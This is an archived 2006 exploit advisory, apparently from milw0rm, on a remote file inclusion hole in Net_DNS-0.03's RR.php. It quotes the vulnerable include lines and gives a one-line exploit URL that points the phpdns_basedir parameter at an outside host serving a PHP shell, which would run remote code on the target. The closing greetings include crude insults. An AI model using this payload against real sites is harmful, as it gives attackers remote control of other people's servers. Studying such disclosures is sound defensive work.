Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14782
HistoryOct 23, 2006 - 12:00 a.m.

Net_DNS: Remote File Inclusion by ToXiC CreW

2006-10-2300:00:00
vulners.com
10
ToXiC

Net_DNS: Remote File Inclusion by ToXiC CreW

ToXic Security Italian CreW

BuG FounD by Drago84

Application Affect:

Net_DNS-0.03

Sorce Code:

http://gentoo.osuosl.org/distfiles/Net_DNS-0.03.tgz

Page:

RR.php

Dir :

/DNS/

Problem:

/* Include files {{{ */

require_once("$phpdns_basedir/DNS/RR/A.php");

require_once("$phpdns_basedir/DNS/RR/NS.php");

require_once("$phpdns_basedir/DNS/RR/CNAME.php");

require_once("$phpdns_basedir/DNS/RR/PTR.php");

require_once("$phpdns_basedir/DNS/RR/SOA.php");

require_once("$phpdns_basedir/DNS/RR/MX.php");

require_once("$phpdns_basedir/DNS/RR/TSIG.php");

/* }}} */#

ExPloit :

http://www.site.com/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=http://sonic-banda-di-lamer.gay/shell.php?

GrEatZ All Member of ToXiC, Str0ke

FUCK #Sonic

ToXiC

milw0rm.com [2006-10-22]